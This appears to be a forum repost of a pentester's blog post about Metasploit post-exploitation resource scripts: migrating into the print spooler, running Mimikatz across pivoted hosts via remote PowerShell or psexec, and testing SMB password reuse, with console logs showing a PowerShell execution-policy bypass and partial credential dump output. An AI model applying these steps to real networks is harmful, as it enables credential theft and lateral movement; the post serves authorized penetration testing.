Nytro Posted January 8, 2015 Report Posted January 8, 2015 (edited) A few Metasploit Post Exploit Resource ScriptsSome of this code is fairly ugly and copy/pasted between files. It is meant for one-offs within a pentest, not necessarily extended and built on. Still, it’s been useful and it might be helpful for those wanting to automate similar things. Plus it was built for real, not just in a lab, so at least it works sometimes Spooler Migrate [code] This was inspired (and some bits copied) from the smart_migrate module. smart_migrate migrates to explorer.exe or starts an instance. Sometimes this isn’t what you want to do. Say you’re running as system – explorer likely is not running in this context, and starting it as system might be suspicious. Also, in my testing when meterpreter timed out it would crash the process you’re executing in, so sometimes it needed to be restarted (not to mention you might not want to migrate to something more critical for persistence). This module checks if a print spooler is running and migrates it (and if it’s not started, it starts it, then migrates to it). Usage Example: [TABLE][TR][TD=class: gutter]1234567891011121314151617181920212223242526[/TD][TD=class: code]meterpreter > getuid Server username: NT AUTHORITY\SYSTEMmeterpreter > background [*] Backgrounding session 1...msf exploit(psexec) > setg SESSION 1SESSION => 1msf exploit(psexec) > resource spooler_migrate.rc [*] Processing spooler_migrate.rc for ERB directives.[*] resource (spooler_migrate.rc)> Ruby Code (917 bytes)[*] migrating to spooler[*] done migratingmsf exploit(psexec) > sessions -i 1[*] Starting interaction with 1...meterpreter > getpid Current pid: 1248meterpreter > psProcess List============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [system Process] 4294967295 ... 1248 488 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe[/TD][/TR][/TABLE] It should not take much effort to customize the script, for example, to set it as autorun or to have it run on all sessions with system. Pivoted Mimikatz through PS Remoting or PSExex [code] During a pentest, it’s fairly common to have code execution on one host and using that host to pivot. Behold, visio skillz Although it’s usually nicer to do everything through remote powershell, there are times when it’s not available. In those cases, it might be necessary to fall back on something else like psexec. This script does the followingPivots through a session Port scans a few ports to see what services are up Runs mimikatz through remote powershell , if it’s available. This is better because the ps1 is never written to disk (this script writes powershell to our pivot box, but nothing ever touches the target box). See my coworker’s blog on the powershell details here. If remote powershell isn’t available, copy the powershell script over and psexec Additionally, this script takes user/pass arguments. This is useful, for example, if you’re executing as SYSTEM on a box nobody’s logged into but you’d like to execute as code on another box as a domain user. One obvious improvement is it could be parallized so you’re running on multiple hosts at once. This wasn’t an issue for me because my scale wasn’t that size, and this script should work fine for a few thousand hosts as long as you’re willing to let it run for a few hours. [TABLE][TR][TD=class: gutter]1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859[/TD][TD=class: code]msf exploit(psexec) > setg RHOST_FILE res_data/hostfile.txtRHOST_FILE => res_data/hostfile.txtmsf exploit(psexec) > setg SESSION 1SESSION => 1msf exploit(psexec) > setg duser TEST.local\\mopeyduser => TEST.local\mopeymsf exploit(psexec) > setg dpass passworddpass => passwordmsf auxiliary(smb_enumshares) > resource mimikatz_remote.rc [*] Processing mimikatz_remote.rc for ERB directives.[*] resource (mimikatz_remote.rc)> Ruby Code (8313 bytes)###################### Beginning AD.rlundtest.local########################################### Routing through Session 1#####################SESSION => 1HOSTNAME => AD.rlundtest.local[*] AD.rlundtest.local resolves to 192.168.137.100[*] Post module execution completedNETMASK => 255.0.0.0SUBNET => 192.168.137.100[*] Running module against CLIENT5[*] Adding a route to 192.168.137.100/255.0.0.0...[*] Post module execution completed###################### PORTSCANNING AD.rlundtest.local#####################RHOSTS => 192.168.137.100PORTS => 5985,5986,445[*] 192.168.137.100:5985 - TCP OPEN[*] 192.168.137.100:445 - TCP OPEN[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedAD.rlundtest.localSMB is enabled. Use this if remote ps is disabledPowershell looks enabled, using that rather than SMB###################### Running Mimikatz on RLUNDTEST.local\mopey on AD.rlundtest.local#####################uploading to C:\Windows\TEMP\hOllYmPh.ps1uploading to /tmp/Invoke-ReflectivePEInjection.ps1.tmpExecuting the following command over remote powershellcmd /c echo "." | powershell -Executionpolicy bypass -Command "& C:\Windows\TEMP\hOllYmPh.ps1 >> "C:\Windows\TEMP\snWgndjt"saving output in /root/.msf4/logs/mimi/AD.rlundtest.local-20130927:233757.txtCleaning remote files###################### Cleaning up: Resetting routes#####################msf auxiliary(tcp) > cat //root/.msf4/logs/mimi/AD.rlundtest.local-20130927:233757.txt[*] exec: cat //root/.msf4/logs/mimi/AD.rlundtest.local-20130927:233757.txtAuthentication ID : 0;996Authentication Package : NegotiatePrimary user : AD$Domain authentication : RLUNDTEST....[/TD][/TR][/TABLE] For the psexec part of this to work I submitted three pull requests to fix minor issues in how metasploit lists files. Two hav been accepted (1 2), but the other has not (at least not yet). Feel free to use that branch, or you could always use another psexec payload of your choice. The old psexec_command will also work for some payloads, they just can’t take a long time or return binary data. This should be easy to customize and can be quite useful. Say you’d like to execute a powershell script through remote powershell, wmic, or psexec (in that order of preference) but don’t know what’s enabled. You can run a modified version of this script and hit a bunch of hosts. Pivoting and Looking for Password Reuse between things [code] Another pivoting example. Say you’ve pwned one domain, like you’ve dumped the hashes from the domain controller, but want to check for password reuse on the second. This is a script for that type of scenario. Looking at the diagram below, you might say, but there’s a brick wall in front of pivot pirate. But aha, there are red arrows. Pivots through a session Picks a random host from a hostfile Checks port 445 Runs smb_login through session Usage is similar to the last couple scripts. Additionally, it could be sped up significantly if it were parallelized, but one hash at a time was plenty fast for my use.Sursa: A few Metasploit Post Exploit Resource Scripts | WebstersProdigy Edited January 8, 2015 by Nytro 1 Quote